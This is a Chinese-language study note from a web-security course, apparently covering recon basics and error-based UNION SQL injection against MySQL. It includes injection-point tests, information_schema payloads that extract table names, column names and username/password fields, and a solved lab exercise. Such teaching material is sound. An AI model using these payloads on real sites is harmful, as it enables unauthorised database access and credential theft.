25.同一个ip多个网站什么意思
就是多个网站用同一个ip,他们被称为互相的旁站,但是同ip不一定是同服务器,因为1个ip里面可能有一个庞大的内网
26.页面源码里是否会存在敏感信息
会,会隐藏一些敏感文件,cms信息,robots.txt,或者一些偷偷隐藏的链接
7kbscan-WebPathBrute
目录扫描工具下载
layer子域名挖掘机
4-1 SQL注入的原理分析 一、SQL注入本质注入攻击的本质,是把用户输入的数据当做代码执行。
这里有两个关键条件:
第一个是用户能够控制输入
第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行
那什么是SQL注入,就是针对SQL语句的注入,也可以理解为用户输入的数据当做SQL语句的代码执行了
SQL注入是1998年一名叫做rfp的黑客发表的一篇文章所进入大众视线的
显错注入-联合查询(Mysql数据库)的基本流程
新知识点: 通过系统自带库查询数据
Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等
information_schema.tables 存放表名和库名的对应
information_schema.columns 存放字段名和表名的对应
[注: information_schema.tables 实际上是选 information_schema库中的tables表]
三、显错注入靶场的做法判断注入点
最古老的方法:
and 1=1 页面正常
and 1=2 页面不正常
最简单的方法:
页面后面加\',看是否报错
老师的方法:
如果是数字型传参,可以尝试-1
例如:
?id=1 页面显示id=1的新闻
?id=2-1 页面显示id=1的新闻
and 1=1 and 1=2 被拦截的可能性太高了
可以尝试 and -1=-1 and -1=-2 and 1>0 or 1=1
或者直接 or sleep(5)
MYSQL注入
判断当前页面字段总数
and 1=1 order by 1,2,3,4,5……
判断显示位
and 1=2 union select 1,2,3,4,5,6,7……
查当前数据库
and 1=2 union select 1,2,database()
查表名
and 1=2 union select 1,2,table_name from information_schema.tables where TABLE_SCHEMA=数据库名 limit 0,1
查列名
and 1=2 Union select 1,2,columns_name from information_schema.COLUMNS where TABLE_NAME=表名 limit 0,1
查字段内容
and 1=2 union select 1,用户名段,密码段 from 表名 limit 0,1
介绍一个函数:GROUP_CONCAT 将多行数据进行整合在一行输出
靶场作业显错注入(一)
and 1=1 页面正常 and 1=2 页面不正常,存在SQL注入
order by 1,2,3正常,4不正常说明有3个字段
union select 1,2,3
说明2,3字段输出
union select 1,2,table_name from information_schema.tables where table_schema=database()
在第三个位置输出表名
limit 0,1显示第一个结果,limit 1,1显示第二个结果
union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=\'error_flag\'
union select 1,2,flag from error_flag
select *from user where id=0 union select 1,2,flag from error_flag limit 0,1
--%20 注释掉后面 或者-- ss
SQL注入基础-本课易错回答分析1.sql注入本质是什么
把用户输入当做代码执行
2.sql注入的条件
用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行